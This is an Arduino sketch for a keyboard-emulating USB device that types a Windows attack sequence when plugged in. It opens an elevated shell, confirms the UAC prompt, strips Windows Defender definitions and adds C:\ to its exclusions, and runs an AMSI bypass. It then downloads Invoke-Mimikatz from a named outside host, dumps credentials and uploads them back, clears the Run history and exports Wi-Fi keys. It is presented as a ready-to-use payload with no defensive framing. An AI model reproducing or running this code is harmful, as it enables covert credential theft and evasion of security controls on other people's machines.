#include #define KEY_DELAY 50 //delay between keystrokes for slow computers void setup() { // Keyboard.begin(); Keyboard.begin(KeyboardLayout_de_DE); //I recommend that you leave a short delay before start while prototyping. //It will will give you some time to reprogram a board before it starts typing. delay(20000); // normal program, only run it once at startup // Windows + R Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); delay(KEY_DELAY); Keyboard.releaseAll(); delay(700); // Start cmd as Administrator Keyboard.println("powershell Start-Process cmd -Verb runAs"); delay(1500); // press ALT + j to confirm execution as Administrator Keyboard.press(KEY_LEFT_ALT); Keyboard.press('j'); delay(KEY_DELAY); Keyboard.releaseAll(); delay(1500); // If no UAC enabled, we printed j on the console, let's // initiate a few CTRL+C's to cancel that and get a fresh // prompt... Keyboard.press(KEY_LEFT_CTRL); Keyboard.press('c'); delay(KEY_DELAY); Keyboard.releaseAll(); delay(200); Keyboard.press(KEY_LEFT_CTRL); Keyboard.press('c'); delay(KEY_DELAY); Keyboard.releaseAll(); delay(300); // Disable Defender; wait a bit longer, because recent only `ershell ...` was printed Keyboard.println("\"C:\\program files\\windows defender\\mpcmdrun.exe\" -RemoveDefinitions -All Set-MpPreference -DisableOAVProtection $true"); delay(200); // Start powershell; wait longer because the OS has to bring another window to foreground Keyboard.println("powershell"); delay(200); // Add C: to Defender exclusion list Keyboard.println("Add-MpPreference -ExclusionPath \"C:\\\""); delay(200); Keyboard.println("\"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'.'NonPublic,Static').SetValue($null,$true)\""); delay(200); Keyboard.println("exit"); delay(400); // Download and execute mimikatz; then upload result log Keyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)\""); delay(6000); // Clear run history Keyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\""); delay(400); // show wlan passwords Keyboard.println("netsh wlan export profile key=clear"); delay(8000); // exit cmd window Keyboard.println("exit"); delay(KEY_DELAY); Keyboard.end(); } void loop() { // do nothing in loop() -- or should we restart the computer? or lock it? or delete something? // or start a fork bomb etc... }